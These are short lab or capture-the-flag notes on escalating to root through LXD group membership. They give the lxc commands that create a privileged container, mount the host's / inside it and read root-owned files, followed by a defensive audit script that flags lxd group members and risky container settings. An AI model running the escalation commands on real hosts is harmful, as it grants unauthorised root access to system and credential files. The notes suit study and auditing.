some notes

Privilege Escalation: LXD group

We have a user who is in the lxd group, which is allowed to manage LXD containers. Create a privileged container:
lxc init ubuntu:16.04 exploit -c security.privileged=true

Next, mount the root of the host OS filesystem at a directory inside the container:
lxc config device add exploit foo disk source=HOST_OS_DIRECTORY path=CONTAINER_MOUNT_LOCATION recursive=true

HOST_OS_DIRECTORY should be the host's root directory, /. CONTAINER_MOUNT_LOCATION should be an available directory in the container, for example /mnt/root.

All that is left is to start the container and read the flag. Start the container:
lxc start exploit

Get an interactive shell in the container:
lxc exec exploit bash

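If you specified the mount location as /mnt/root, then inside the container the flag is located at /mnt/root/root/flag.txt. This works because root in a privileged container is not remapped to an unprivileged host user, so the mounted host files are accessed with host root's permissions.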
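
To check a host for the configuration these notes rely on, the following audit sketch (an added example, not part of the original notes) lists lxd group members and flags containers that are privileged or have the host's / attached as a disk device. The function names and the sample inputs are constructed for illustration; the config sample follows the YAML layout printed by lxc config show.

```shell
#!/bin/sh
# Added audit example, not part of the original notes.

# Members of the lxd group, read from group(5)-format lines on stdin.
lxd_group_members() {
    awk -F: '$1 == "lxd" && $4 != "" { gsub(",", "\n", $4); print $4 }'
}

# Reads `lxc config show --expanded NAME` YAML on stdin and prints one line
# per risky setting; prints nothing for a config with neither setting.
risky_settings() {
    awk '
        function report() {
            if (typ == "disk" && src == "/") print "host / mounted via device " dev
        }
        /^[^ ]/ { section = $1 }    # top-level key such as config: or devices:
        section == "config:" && $1 == "security.privileged:" && $2 ~ /true/ {
            print "privileged container"
        }
        section == "devices:" && /^  [^ ]/ {    # a new device entry begins
            report(); dev = $1; sub(/:$/, "", dev); src = ""; typ = ""
        }
        section == "devices:" && $1 == "source:" { src = $2 }
        section == "devices:" && $1 == "type:"   { typ = $2 }
        END { report() }
    '
}

# Constructed sample inputs (not captured from a real host).
SAMPLE_GROUP='root:x:0:
lxd:x:110:alice,bob
sudo:x:27:carol'

SAMPLE_CONFIG='architecture: x86_64
config:
  security.privileged: "true"
devices:
  foo:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false'

echo "lxd group members:"
printf '%s\n' "$SAMPLE_GROUP" | lxd_group_members
echo "findings for sample container config:"
printf '%s\n' "$SAMPLE_CONFIG" | risky_settings
```

On a real host, pipe `getent group lxd` into lxd_group_members and each container's `lxc config show --expanded NAME` into risky_settings. Any account reported in the lxd group should be treated as root-equivalent on that host.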